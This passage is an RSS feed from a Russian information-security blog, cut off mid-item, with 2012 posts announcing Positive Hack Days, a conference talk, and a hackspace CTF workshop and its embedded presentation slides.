<?xml version="1.0" encoding="UTF-8"?>
<?xml-stylesheet type="text/xsl" media="screen" href="/~d/styles/rss2enclosuresfull.xsl"?><?xml-stylesheet type="text/css" media="screen" href="http://feeds.feedburner.com/~d/styles/itemcontent.css"?><rss xmlns:media="http://search.yahoo.com/mrss/" xmlns:itunes="http://www.itunes.com/dtds/podcast-1.0.dtd" version="2.0"><channel><title>В тему ИБ</title><link>http://devteev.blogspot.com/</link><atom10:link xmlns:atom10="http://www.w3.org/2005/Atom" rel="self" type="application/rss+xml" href="http://feeds.feedburner.com/devteev" /><description></description><language>en</language><managingEditor>noreply@blogger.com (Dmitry Evteev)</managingEditor><lastBuildDate>Tue, 22 May 2012 08:19:33 PDT</lastBuildDate><generator>Blogger http://www.blogger.com</generator><openSearch:totalResults xmlns:openSearch="http://a9.com/-/spec/opensearch/1.1/">282</openSearch:totalResults><openSearch:startIndex xmlns:openSearch="http://a9.com/-/spec/opensearch/1.1/">1</openSearch:startIndex><openSearch:itemsPerPage xmlns:openSearch="http://a9.com/-/spec/opensearch/1.1/">25</openSearch:itemsPerPage><feedburner:info xmlns:feedburner="http://rssnamespace.org/feedburner/ext/1.0" uri="devteev" /><atom10:link xmlns:atom10="http://www.w3.org/2005/Atom" rel="hub" href="http://pubsubhubbub.appspot.com/" /><media:category scheme="http://www.itunes.com/dtds/podcast-1.0.dtd">Technology</media:category><itunes:owner><itunes:email>noreply@blogger.com</itunes:email></itunes:owner><itunes:explicit>no</itunes:explicit><itunes:subtitle></itunes:subtitle><itunes:category text="Technology" /><item><title>Positive Hack Days 2012</title><link>http://devteev.blogspot.com/2012/05/positive-hack-days-2012.html</link><category>phdays</category><author>noreply@blogger.com (Dmitry Evteev)</author><pubDate>Mon, 14 May 2012 03:17:17 PDT</pubDate><guid isPermaLink="false">tag:blogger.com,1999:blog-1151777387719242828.post-8459425077974433242</guid><description>&lt;div dir="ltr" style="text-align: left;" trbidi="on"&gt;
Сегодня &lt;strike&gt;как-то неожиданно&lt;/strike&gt;&amp;nbsp;запланированно&amp;nbsp;прошла регистрация на форум &lt;a href="http://phdays.ru/"&gt;Positive Hack Days 2012&lt;/a&gt;. Регистрация продлилась всего 8 минут и затем была закрыта, т.к.&amp;nbsp;количество желающих посетить мероприятие превысило вместительность &lt;a href="http://digitaloctober.ru/"&gt;площадки&lt;/a&gt;, на которой пройдет форум. Если вы не успели&amp;nbsp;зарегистрироваться, не расстраивайтесь! Будет организована&amp;nbsp;трансляция всех секций форума на двух языках. Кроме того, вы можете&amp;nbsp;участвовать&amp;nbsp;в online-конкурсах, которые будут проходить в дни проведения форума. Присоединяйтесь!&amp;nbsp;&lt;a href="http://phdays.ru/registration/"&gt;http://phdays.ru/registration/&lt;/a&gt;&lt;br /&gt;
&lt;div&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;a href="http://3.bp.blogspot.com/-v5pISLPIkoM/T7DbPN5k--I/AAAAAAAABbA/pUAZ6kHt9lM/s1600/%D0%BA%D0%BE%D0%BD%D0%BA%D1%83%D1%80%D1%81%D1%8B.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="454" src="http://3.bp.blogspot.com/-v5pISLPIkoM/T7DbPN5k--I/AAAAAAAABbA/pUAZ6kHt9lM/s640/%D0%BA%D0%BE%D0%BD%D0%BA%D1%83%D1%80%D1%81%D1%8B.jpg" width="640" /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;div&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;/div&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/1151777387719242828-8459425077974433242?l=devteev.blogspot.com' alt='' /&gt;&lt;/div&gt;</description><app:edited xmlns:app="http://www.w3.org/2007/app">2012-05-14T14:17:17.293+04:00</app:edited><media:thumbnail url="http://3.bp.blogspot.com/-v5pISLPIkoM/T7DbPN5k--I/AAAAAAAABbA/pUAZ6kHt9lM/s72-c/%D0%BA%D0%BE%D0%BD%D0%BA%D1%83%D1%80%D1%81%D1%8B.jpg" height="72" width="72" /><thr:total xmlns:thr="http://purl.org/syndication/thread/1.0">6</thr:total></item><item><title>PHDays 2012</title><link>http://devteev.blogspot.com/2012/05/phdays-2012.html</link><category>phdays</category><author>noreply@blogger.com (Dmitry Evteev)</author><pubDate>Tue, 08 May 2012 06:19:46 PDT</pubDate><guid isPermaLink="false">tag:blogger.com,1999:blog-1151777387719242828.post-2164437246127044207</guid><description>&lt;div dir="ltr" style="text-align: left;" trbidi="on"&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;a href="http://4.bp.blogspot.com/-eIYVtbAPeB8/T6kdBOc2-SI/AAAAAAAABa0/qgk22E6QQcM/s1600/v.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="188" src="http://4.bp.blogspot.com/-eIYVtbAPeB8/T6kdBOc2-SI/AAAAAAAABa0/qgk22E6QQcM/s200/v.png" width="200" /&gt;&lt;/a&gt;&lt;/div&gt;
Мы запустились!11&lt;br /&gt;
&lt;br /&gt;
Информация о форуме -&amp;nbsp;&lt;a href="http://phdays.ru/about/"&gt;http://phdays.ru/about/&lt;/a&gt;&lt;br /&gt;
Нас поддерживают -&amp;nbsp;&lt;a href="http://phdays.ru/registration/everywhere/"&gt;http://phdays.ru/registration/everywhere/&lt;/a&gt;&lt;br /&gt;
Программа форума -&amp;nbsp;&lt;a href="http://phdays.ru/program/"&gt;http://phdays.ru/program/&lt;/a&gt;&lt;br /&gt;
Конкурсная программа -&amp;nbsp;&lt;a href="http://phdays.ru/program/contests/"&gt;http://phdays.ru/program/contests/&lt;/a&gt;&amp;nbsp;(и сейчас уже проходят два конкурса - "Взорвем городишку" и "Хакеры против форензики"; прими участие и получи инвайт на форум!).&amp;nbsp;Отдельно хочется выделить конкурс "&lt;b&gt;Hack2own&lt;/b&gt;", предварительный бюджет которого&amp;nbsp;составляет&amp;nbsp;600.000 рублей.&amp;nbsp;Информация о самом зрелищном конкурсе PHDays CTF 2012 -&amp;nbsp;&lt;a href="http://phdays.ru/ctf/"&gt;http://phdays.ru/ctf/&lt;/a&gt;&lt;br /&gt;
&lt;br /&gt;
Вся информация также представлена на английском языке -&amp;nbsp;&lt;a href="http://phdays.com/"&gt;http://phdays.com/&lt;/a&gt;&lt;/div&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/1151777387719242828-2164437246127044207?l=devteev.blogspot.com' alt='' /&gt;&lt;/div&gt;</description><app:edited xmlns:app="http://www.w3.org/2007/app">2012-05-08T17:19:46.965+04:00</app:edited><media:thumbnail url="http://4.bp.blogspot.com/-eIYVtbAPeB8/T6kdBOc2-SI/AAAAAAAABa0/qgk22E6QQcM/s72-c/v.png" height="72" width="72" /><thr:total xmlns:thr="http://purl.org/syndication/thread/1.0">0</thr:total></item><item><title>Software People 2012: Собираем команду хакеров</title><link>http://devteev.blogspot.com/2012/04/software-people-2012.html</link><category>мероприятия</category><category>positive technologies</category><category>выступления</category><author>noreply@blogger.com (Dmitry Evteev)</author><pubDate>Mon, 16 Apr 2012 02:09:28 PDT</pubDate><guid isPermaLink="false">tag:blogger.com,1999:blog-1151777387719242828.post-6914102712907501963</guid><description>На днях в очередной раз побывал в здании &lt;a href="http://digitaloctober.ru/"&gt;Digital October&lt;/a&gt; и &lt;a href="http://softwarepeople.ru/2012/speakers/#evteev"&gt;выступил&lt;/a&gt; в формате мероприятия &lt;a href="http://softwarepeople.ru/2012/"&gt;Software People 2012&lt;/a&gt;. Презентация с выступления приведена ниже.&lt;br /&gt;
&lt;center&gt;&lt;br /&gt;
&lt;div style="width:425px" id="__ss_12555070"&gt;&lt;strong style="display:block;margin:12px 0 4px"&gt;&lt;a href="http://www.slideshare.net/devteev/swp12-devteev-final-12555070" title="Собираем команду хакеров" target="_blank"&gt;Собираем команду хакеров&lt;/a&gt;&lt;/strong&gt; &lt;iframe src="http://www.slideshare.net/slideshow/embed_code/12555070" width="425" height="355" frameborder="0" marginwidth="0" marginheight="0" scrolling="no"&gt;&lt;/iframe&gt; &lt;div style="padding:5px 0 12px"&gt;View more &lt;a href="http://www.slideshare.net/thecroaker/death-by-powerpoint" target="_blank"&gt;PowerPoint&lt;/a&gt; from &lt;a href="http://www.slideshare.net/devteev" target="_blank"&gt;Dmitry Evteev&lt;/a&gt; &lt;/div&gt;&lt;/div&gt;&lt;/center&gt;&lt;br /&gt;
&lt;br /&gt;
PS. выкладываю с большим опозданием т.к. &lt;a href="http://slideshare.net"&gt;slideshare.net&lt;/a&gt; неожиданно глючил на той неделе...&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/1151777387719242828-6914102712907501963?l=devteev.blogspot.com' alt='' /&gt;&lt;/div&gt;</description><app:edited xmlns:app="http://www.w3.org/2007/app">2012-04-16T13:09:28.972+04:00</app:edited><thr:total xmlns:thr="http://purl.org/syndication/thread/1.0">2</thr:total></item><item><title>PHDAYS 2012: начало</title><link>http://devteev.blogspot.com/2012/04/phdays-2012.html</link><category>phdays</category><author>noreply@blogger.com (Dmitry Evteev)</author><pubDate>Fri, 06 Apr 2012 01:10:03 PDT</pubDate><guid isPermaLink="false">tag:blogger.com,1999:blog-1151777387719242828.post-5428106324247753047</guid><description>&lt;div&gt;&lt;p&gt;&amp;#1044;&amp;#1086; &amp;#1084;&amp;#1077;&amp;#1078;&amp;#1076;&amp;#1091;&amp;#1085;&amp;#1072;&amp;#1088;&amp;#1086;&amp;#1076;&amp;#1085;&amp;#1086;&amp;#1075;&amp;#1086; &amp;#1092;&amp;#1086;&amp;#1088;&amp;#1091;&amp;#1084;&amp;#1072; &amp;#1087;&amp;#1086; &amp;#1087;&amp;#1088;&amp;#1072;&amp;#1082;&amp;#1090;&amp;#1080;&amp;#1095;&amp;#1077;&amp;#1089;&amp;#1082;&amp;#1086;&amp;#1081; &amp;#1073;&amp;#1077;&amp;#1079;&amp;#1086;&amp;#1087;&amp;#1072;&amp;#1089;&amp;#1085;&amp;#1086;&amp;#1089;&amp;#1090;&amp;#1080; Positive Hack Days 2012 (#phdays) &amp;#1086;&amp;#1089;&amp;#1090;&amp;#1072;&amp;#1083;&amp;#1086;&amp;#1089;&amp;#1100; &amp;#1084;&amp;#1077;&amp;#1085;&amp;#1077;&amp;#1077; &amp;#1076;&amp;#1074;&amp;#1091;&amp;#1093; &amp;#1084;&amp;#1077;&amp;#1089;&amp;#1103;&amp;#1094;&amp;#1077;&amp;#1074;. &amp;#1055;&amp;#1088;&amp;#1086;&amp;#1075;&amp;#1088;&amp;#1072;&amp;#1084;&amp;#1084;&amp;#1072; &amp;#1074; &amp;#1094;&amp;#1077;&amp;#1083;&amp;#1086;&amp;#1084; &amp;#1089;&amp;#1092;&amp;#1086;&amp;#1088;&amp;#1084;&amp;#1080;&amp;#1088;&amp;#1086;&amp;#1074;&amp;#1072;&amp;#1085;&amp;#1072; &amp;#1080; &amp;#1086;&amp;#1085;&amp;#1072; &amp;#1072;&amp;#1087;&amp;#1091;&amp;#1087;&amp;#1077;&amp;#1085;&amp;#1085;&amp;#1072;! &amp;#1053;&amp;#1072;&amp;#1087;&amp;#1088;&amp;#1072;&amp;#1074;&amp;#1083;&amp;#1077;&amp;#1085;&amp;#1080;&amp;#1103; &amp;#1090;&amp;#1077;&amp;#1084;&amp;#1072;&amp;#1090;&amp;#1080;&amp;#1095;&amp;#1077;&amp;#1089;&amp;#1082;&amp;#1080;&amp;#1093; &amp;#1082;&amp;#1086;&amp;#1085;&amp;#1082;&amp;#1091;&amp;#1088;&amp;#1089;&amp;#1086;&amp;#1074; &amp;#1076;&amp;#1086;, &amp;#1087;&amp;#1086;&amp;#1089;&amp;#1083;&amp;#1077; &amp;#1080; &amp;#1074;&amp;#1086; &amp;#1074;&amp;#1088;&amp;#1077;&amp;#1084;&amp;#1103; &amp;#1084;&amp;#1077;&amp;#1088;&amp;#1086;&amp;#1087;&amp;#1088;&amp;#1080;&amp;#1103;&amp;#1090;&amp;#1080;&amp;#1103; (&amp;#1074;&amp;#1082;&amp;#1083;&amp;#1102;&amp;#1095;&amp;#1072;&amp;#1103; &amp;#1084;&amp;#1077;&amp;#1075;&amp;#1072; CTF 2012) &amp;#1087;&amp;#1088;&amp;#1086;&amp;#1088;&amp;#1072;&amp;#1073;&amp;#1086;&amp;#1090;&amp;#1072;&amp;#1085;&amp;#1099; &amp;#1080; &amp;#1074; &amp;#1085;&amp;#1072;&amp;#1089;&amp;#1090;&amp;#1086;&amp;#1103;&amp;#1097;&amp;#1077;&amp;#1077; &amp;#1074;&amp;#1088;&amp;#1077;&amp;#1084;&amp;#1103; &amp;#1080;&amp;#1076;&amp;#1077;&amp;#1090; &amp;#1080;&amp;#1093; &amp;#1072;&amp;#1082;&amp;#1090;&amp;#1080;&amp;#1074;&amp;#1085;&amp;#1072;&amp;#1103; &amp;#1088;&amp;#1072;&amp;#1079;&amp;#1088;&amp;#1072;&amp;#1073;&amp;#1086;&amp;#1090;&amp;#1082;&amp;#1072;. &amp;#1053;&amp;#1072; &amp;#1089;&amp;#1083;&amp;#1077;&amp;#1076;&amp;#1091;&amp;#1102;&amp;#1097;&amp;#1077;&amp;#1081; &amp;#1085;&amp;#1077;&amp;#1076;&amp;#1077;&amp;#1083;&amp;#1077; &amp;#1087;&amp;#1083;&amp;#1072;&amp;#1085;&amp;#1080;&amp;#1088;&amp;#1091;&amp;#1077;&amp;#1090;&amp;#1089;&amp;#1103; &amp;#1079;&amp;#1072;&amp;#1087;&amp;#1091;&amp;#1089;&amp;#1082; &amp;#1085;&amp;#1086;&amp;#1074;&amp;#1086;&amp;#1075;&amp;#1086; &amp;#1089;&amp;#1072;&amp;#1081;&amp;#1090;&amp;#1072; &amp;#1092;&amp;#1086;&amp;#1088;&amp;#1091;&amp;#1084;&amp;#1072;. &amp;#1057;&amp;#1083;&amp;#1077;&amp;#1076;&amp;#1080;&amp;#1090;&amp;#1077; &amp;#1079;&amp;#1072; &amp;#1085;&amp;#1086;&amp;#1074;&amp;#1086;&amp;#1089;&amp;#1090;&amp;#1103;&amp;#1084;&amp;#1080;.&lt;/p&gt;
&lt;p&gt;&amp;#1047;.&amp;#1067;. &amp;#1048; &amp;#1076;&amp;#1072;, &amp;#1101;&amp;#1090;&amp;#1086; &amp;#1084;&amp;#1086;&amp;#1081; &amp;#1087;&amp;#1077;&amp;#1088;&amp;#1074;&amp;#1099;&amp;#1081; &amp;#1087;&amp;#1086;&amp;#1089;&amp;#1090; &amp;#1089; &amp;#1072;&amp;#1085;&amp;#1076;&amp;#1088;&amp;#1086;&amp;#1080;&amp;#1076;&amp;#1072;. "&amp;#1042;&amp;#1089;&amp;#1077;, &amp;#1082;&amp;#1086;&amp;#1075;&amp;#1076;&amp;#1072;-&amp;#1090;&amp;#1086; &amp;#1073;&amp;#1099;&amp;#1074;&amp;#1072;&amp;#1077;&amp;#1090; &amp;#1074; &amp;#1087;&amp;#1077;&amp;#1088;&amp;#1074;&amp;#1099;&amp;#1081; &amp;#1088;&amp;#1072;&amp;#1079;" (&amp;#1089;)&lt;/p&gt;
&lt;/div&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/1151777387719242828-5428106324247753047?l=devteev.blogspot.com' alt='' /&gt;&lt;/div&gt;</description><app:edited xmlns:app="http://www.w3.org/2007/app">2012-04-06T12:10:03.177+04:00</app:edited><thr:total xmlns:thr="http://purl.org/syndication/thread/1.0">2</thr:total></item><item><title>Neúron Хакспейс: итоги встречи</title><link>http://devteev.blogspot.com/2012/04/neuron.html</link><category>мероприятия</category><category>CTF</category><category>HackQuest</category><category>phdays</category><category>positive technologies</category><category>workshop</category><author>noreply@blogger.com (Dmitry Evteev)</author><pubDate>Tue, 03 Apr 2012 15:13:20 PDT</pubDate><guid isPermaLink="false">tag:blogger.com,1999:blog-1151777387719242828.post-1810100457926717466</guid><description>&lt;div dir="ltr" style="text-align: left;" trbidi="on"&gt;Интересно, но как-то так получилось, что по материалам прошлогоднего &lt;a href="http://phdays.ru/"&gt;PHDays&lt;/a&gt; мы встречались на &lt;a href="http://neuronspace.timepad.ru/event/21567"&gt;хакспейсе&lt;/a&gt; за два месяца до запланированного форума в этом году. И! &lt;strike&gt;Неожиданно&lt;/strike&gt; Ожидаемо собрали в одном месте довольно много технически грамотных людей, которым действительно было интересно то, что мы рассказывали. Это, несомненно, очень приятно.&lt;br /&gt;
&lt;a name='more'&gt;&lt;/a&gt;&lt;br /&gt;
Я не буду слишком многословен про проведенный воркшоп, скажу лишь, что все было пупенно! А наливайка, ДА, наливайка удалась :)&lt;br /&gt;
&lt;br /&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://4.bp.blogspot.com/-yfg4WPrgesA/T3t0qP00DZI/AAAAAAAABak/8_IO-wVFjLg/s1600/drunk-to-hack.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="267" src="http://4.bp.blogspot.com/-yfg4WPrgesA/T3t0qP00DZI/AAAAAAAABak/8_IO-wVFjLg/s400/drunk-to-hack.png" width="400" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;
&lt;br /&gt;
И вот еще что. Компания &lt;a href="http://www.ptsecurity.ru/"&gt;Positive Technologies&lt;/a&gt; стала техническим спонсором площадки &lt;a href="http://neuronspace.timepad.ru/"&gt;Neúron Хакспейс&lt;/a&gt;:&lt;br /&gt;
&lt;br /&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://1.bp.blogspot.com/-mPsGXaQccwA/T3ty55MMyMI/AAAAAAAABac/dONGnQYKhTo/s1600/pt.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="243" src="http://1.bp.blogspot.com/-mPsGXaQccwA/T3ty55MMyMI/AAAAAAAABac/dONGnQYKhTo/s400/pt.png" width="400" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;
По просьбе участников воркшопа, выкладываю все презентации на сайт SlideShare мероприятия &lt;a href="http://www.slideshare.net/phdays/"&gt;PHDays&lt;/a&gt;:&lt;br /&gt;
&lt;br /&gt;
&lt;center&gt;&lt;br /&gt;
&lt;div style="width:425px" id="__ss_11609900"&gt;&lt;strong style="display:block;margin:12px 0 4px"&gt;&lt;a href="http://www.slideshare.net/devteev/phdays-ctf-2011-qualsafterparty" title="PHDays CTF 2011 Quals/Afterparty: как это было" target="_blank"&gt;PHDays CTF 2011 Quals/Afterparty: как это было&lt;/a&gt;&lt;/strong&gt; &lt;iframe src="http://www.slideshare.net/slideshow/embed_code/11609900" width="425" height="355" frameborder="0" marginwidth="0" marginheight="0" scrolling="no"&gt;&lt;/iframe&gt; &lt;div style="padding:5px 0 12px"&gt;View more &lt;a href="http://www.slideshare.net/thecroaker/death-by-powerpoint" target="_blank"&gt;PowerPoint&lt;/a&gt; from &lt;a href="http://www.slideshare.net/devteev" target="_blank"&gt;Dmitry Evteev&lt;/a&gt; &lt;/div&gt;&lt;/div&gt;&lt;br /&gt;
&lt;div style="width:425px" id="__ss_12273632"&gt;&lt;strong style="display:block;margin:12px 0 4px"&gt;&lt;a href="http://www.slideshare.net/phdays/plwww" title="Юрий Гольцев - Сервис PLWWW" target="_blank"&gt;Юрий Гольцев - Сервис PLWWW&lt;/a&gt;&lt;/strong&gt; &lt;iframe src="http://www.slideshare.net/slideshow/embed_code/12273632" width="425" height="355" frameborder="0" marginwidth="0" marginheight="0" scrolling="no"&gt;&lt;/iframe&gt; &lt;div style="padding:5px 0 12px"&gt;View more &lt;a href="http://www.slideshare.net/thecroaker/death-by-powerpoint" target="_blank"&gt;PowerPoint&lt;/a&gt; from &lt;a href="http://www.slideshare.net/phdays" target="_blank"&gt;Positive Hack Days&lt;/a&gt; &lt;/div&gt;&lt;/div&gt;&lt;br /&gt;
&lt;div style="width:425px" id="__ss_12273627"&gt;&lt;strong style="display:block;margin:12px 0 4px"&gt;&lt;a href="http://www.slideshare.net/phdays/xml-external-entity" title="Сергей Щербель - Атаки XML eXternal Entity" target="_blank"&gt;Сергей Щербель - Атаки XML eXternal Entity&lt;/a&gt;&lt;/strong&gt; &lt;iframe src="http://www.slideshare.net/slideshow/embed_code/12273627" width="425" height="355" frameborder="0" marginwidth="0" marginheight="0" scrolling="no"&gt;&lt;/iframe&gt; &lt;div style="padding:5px 0 12px"&gt;View more &lt;a href="http://www.slideshare.net/thecroaker/death-by-powerpoint" target="_blank"&gt;PowerPoint&lt;/a&gt; from &lt;a href="http://www.slideshare.net/phdays" target="_blank"&gt;Positive Hack Days&lt;/a&gt; &lt;/div&gt;&lt;/div&gt;&lt;br /&gt;
&lt;div style="width:425px" id="__ss_12273623"&gt;&lt;strong style="display:block;margin:12px 0 4px"&gt;&lt;a href="http://www.slideshare.net/phdays/javagwt" title="Артем Чайкин - JAVA+GWT" target="_blank"&gt;Артем Чайкин - JAVA+GWT&lt;/a&gt;&lt;/strong&gt; &lt;iframe src="http://www.slideshare.net/slideshow/embed_code/12273623" width="425" height="355" frameborder="0" marginwidth="0" marginheight="0" scrolling="no"&gt;&lt;/iframe&gt; &lt;div style="padding:5px 0 12px"&gt;View more &lt;a href="http://www.slideshare.net/thecroaker/death-by-powerpoint" target="_blank"&gt;PowerPoint&lt;/a&gt; from &lt;a href="http://www.slideshare.net/phdays" target="_blank"&gt;Positive Hack Days&lt;/a&gt; &lt;/div&gt;&lt;/div&gt;&lt;br /&gt;
&lt;div style="width:425px" id="__ss_12273618"&gt;&lt;strong style="display:block;margin:12px 0 4px"&gt;&lt;a href="http://www.slideshare.net/phdays/forensics-12273618" title="Глеб Грицай - Forensics" target="_blank"&gt;Глеб Грицай - Forensics&lt;/a&gt;&lt;/strong&gt; &lt;iframe src="http://www.slideshare.net/slideshow/embed_code/12273618" width="425" height="355" frameborder="0" marginwidth="0" marginheight="0" scrolling="no"&gt;&lt;/iframe&gt; &lt;div style="padding:5px 0 12px"&gt;View more &lt;a href="http://www.slideshare.net/thecroaker/death-by-powerpoint" target="_blank"&gt;PowerPoint&lt;/a&gt; from &lt;a href="http://www.slideshare.net/phdays" target="_blank"&gt;Positive Hack Days&lt;/a&gt; &lt;/div&gt;&lt;/div&gt;&lt;br /&gt;
&lt;div style="width:425px" id="__ss_12273625"&gt;&lt;strong style="display:block;margin:12px 0 4px"&gt;&lt;a href="http://www.slideshare.net/phdays/port-knocking-short-notes" title="Александр Зайцев - Port Knocking, short notes " target="_blank"&gt;Александр Зайцев - Port Knocking, short notes &lt;/a&gt;&lt;/strong&gt; &lt;iframe src="http://www.slideshare.net/slideshow/embed_code/12273625" width="425" height="355" frameborder="0" marginwidth="0" marginheight="0" scrolling="no"&gt;&lt;/iframe&gt; &lt;div style="padding:5px 0 12px"&gt;View more &lt;a href="http://www.slideshare.net/thecroaker/death-by-powerpoint" target="_blank"&gt;PowerPoint&lt;/a&gt; from &lt;a href="http://www.slideshare.net/phdays" target="_blank"&gt;Positive Hack Days&lt;/a&gt; &lt;/div&gt;&lt;/div&gt;&lt;br /&gt;
&lt;div style="width:425px" id="__ss_12273629"&gt;&lt;strong style="display:block;margin:12px 0 4px"&gt;&lt;a href="http://www.slideshare.net/phdays/collider-12273629" title="Юрий Гольцев - Сервис Collider" target="_blank"&gt;Юрий Гольцев - Сервис Collider&lt;/a&gt;&lt;/strong&gt; &lt;iframe src="http://www.slideshare.net/slideshow/embed_code/12273629" width="425" height="355" frameborder="0" marginwidth="0" marginheight="0" scrolling="no"&gt;&lt;/iframe&gt; &lt;div style="padding:5px 0 12px"&gt;View more &lt;a href="http://www.slideshare.net/thecroaker/death-by-powerpoint" target="_blank"&gt;PowerPoint&lt;/a&gt; from &lt;a href="http://www.slideshare.net/phdays" target="_blank"&gt;Positive Hack Days&lt;/a&gt; &lt;/div&gt;&lt;/div&gt;&lt;/center&gt;&lt;br /&gt;
&lt;br /&gt;
Спасибо всем, кто пришел и поддержал предложенный нами формат неформальной встречи! До новых встреч на хакспейсе!&lt;/div&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/1151777387719242828-1810100457926717466?l=devteev.blogspot.com' alt='' /&gt;&lt;/div&gt;</description><app:edited xmlns:app="http://www.w3.org/2007/app">2012-04-04T02:13:20.054+04:00</app:edited><media:thumbnail url="http://4.bp.blogspot.com/-yfg4WPrgesA/T3t0qP00DZI/AAAAAAAABak/8_IO-wVFjLg/s72-c/drunk-to-hack.png" height="72" width="72" /><thr:total xmlns:thr="http://purl.org/syndication/thread/1.0">1</thr:total></item><item><title>Воркшоп по итогам PHDays CTF 2011 на Хакспейсе Neúron</title><link>http://devteev.blogspot.com/2012/03/phdays-ctf-2011-neuron.html</link><category>мероприятия</category><category>CTF</category><category>HackQuest</category><category>phdays</category><author>noreply@blogger.com (Dmitry Evteev)</author><pubDate>Tue, 27 Mar 2012 23:55:37 PDT</pubDate><guid isPermaLink="false">tag:blogger.com,1999:blog-1151777387719242828.post-6855309976611560603</guid><description>&lt;div dir="ltr" style="text-align: left;" trbidi="on"&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://1.bp.blogspot.com/-H3gB3Rc6G9k/T3I4Tu1NHqI/AAAAAAAABaU/9O6gOW4pkUE/s1600/hack-the-planet.png" imageanchor="1" style="clear: right; float: right; margin-bottom: 1em; margin-left: 1em;"&gt;&lt;img border="0" height="124" src="http://1.bp.blogspot.com/-H3gB3Rc6G9k/T3I4Tu1NHqI/AAAAAAAABaU/9O6gOW4pkUE/s200/hack-the-planet.png" width="200" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;b&gt;31 марта 2012&lt;/b&gt; года в &lt;a href="http://neuronspace.timepad.ru/event/21567"&gt;хакспейсе Neuron&lt;/a&gt; пройдет воркшоп, посвященный итогам &lt;a href="http://phdays.ru/ctf_afterparty.asp"&gt;PHDays CTF Afterparty&lt;/a&gt;.&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;Формат встречи&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
На площадке будет развернута виртуальная сеть, аналогичная той, что использовалась на отборочных соревнованиях CTF Afterparty 2011. Вы сможете не только выяснить секреты создания дьявольски сложных заданий, но и порешать их по ходу действия, поэтому не забудьте захватить ноутбук.&lt;br /&gt;
&lt;br /&gt;
Другим поводом посетить хакспейс может стать желание неформально встретиться и потрещать на другие, не связанные CTF-афтепати темами.&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;Время проведения воркшопа:&lt;/b&gt; с 11 до 18 ч.&lt;br /&gt;
&lt;br /&gt;
&lt;a name='more'&gt;&lt;/a&gt;&lt;br /&gt;
&lt;b&gt;Кто?&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
Докладчики: мну, &lt;a href="https://twitter.com/#!/ygoltsev"&gt;Юрий Гольцев&lt;/a&gt;, &lt;a href="https://twitter.com/#!/repdet"&gt;Глеб Грицай&lt;/a&gt;, &lt;a href="https://twitter.com/#!/arbitrarycode"&gt;Александр Зайцев&lt;/a&gt;, Сергей Щербель, Артем Чайкин.&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;Где и как?&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
Вход совершенно свободный, но требует обязательной регистрации на &lt;a href="http://neuronspace.timepad.ru/event/21567#eventregisterform"&gt;сайте хакспейса&lt;/a&gt; или по адресу электронной почты - &lt;a href="mailto:seminars@ptsecurity.ru"&gt;seminars@ptsecurity.ru&lt;/a&gt;.&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;Как добраться?&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
1. м. Воробьёвы горы, последний вагон из центра, выход на улицу направо.&lt;br /&gt;
2. По зелёной велосипедной дорожке пока не окажетесь почти напротив здания &lt;a href="http://upload.wikimedia.org/wikipedia/commons/f/fb/RAN_01.jpg"&gt;Академии Наук&lt;/a&gt;.&lt;br /&gt;
3. Когда увидите слева вывеску «Автомойка», вы почти пришли.&lt;br /&gt;
4. Пропустите один шлагбаум и мимо второго шлагбаума зайдите во двор.&lt;br /&gt;
5. Справа от вас будет металлическая дверь и цифра 17 (номер корпуса) рядом с ней.&lt;br /&gt;
6. Встаньте около двери и позвоните организатору мероприятия или дождитесь, пока дверь откроется, и проходите.&lt;br /&gt;
7. Внутри здания следуйте по белым указателям «Neúron». Мансарда офис 444.&lt;br /&gt;
&lt;br /&gt;
Ждем вас!&lt;/div&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/1151777387719242828-6855309976611560603?l=devteev.blogspot.com' alt='' /&gt;&lt;/div&gt;</description><app:edited xmlns:app="http://www.w3.org/2007/app">2012-03-28T10:55:37.668+04:00</app:edited><media:thumbnail url="http://1.bp.blogspot.com/-H3gB3Rc6G9k/T3I4Tu1NHqI/AAAAAAAABaU/9O6gOW4pkUE/s72-c/hack-the-planet.png" height="72" width="72" /><thr:total xmlns:thr="http://purl.org/syndication/thread/1.0">0</thr:total></item><item><title>100% Virus Free Podcast #38</title><link>http://devteev.blogspot.com/2012/03/100-virus-free-podcast-38.html</link><category>phdays</category><category>positive technologies</category><category>podcast</category><author>noreply@blogger.com (Dmitry Evteev)</author><pubDate>Mon, 26 Mar 2012 12:07:46 PDT</pubDate><guid isPermaLink="false">tag:blogger.com,1999:blog-1151777387719242828.post-5622335338094371958</guid><description>&lt;div 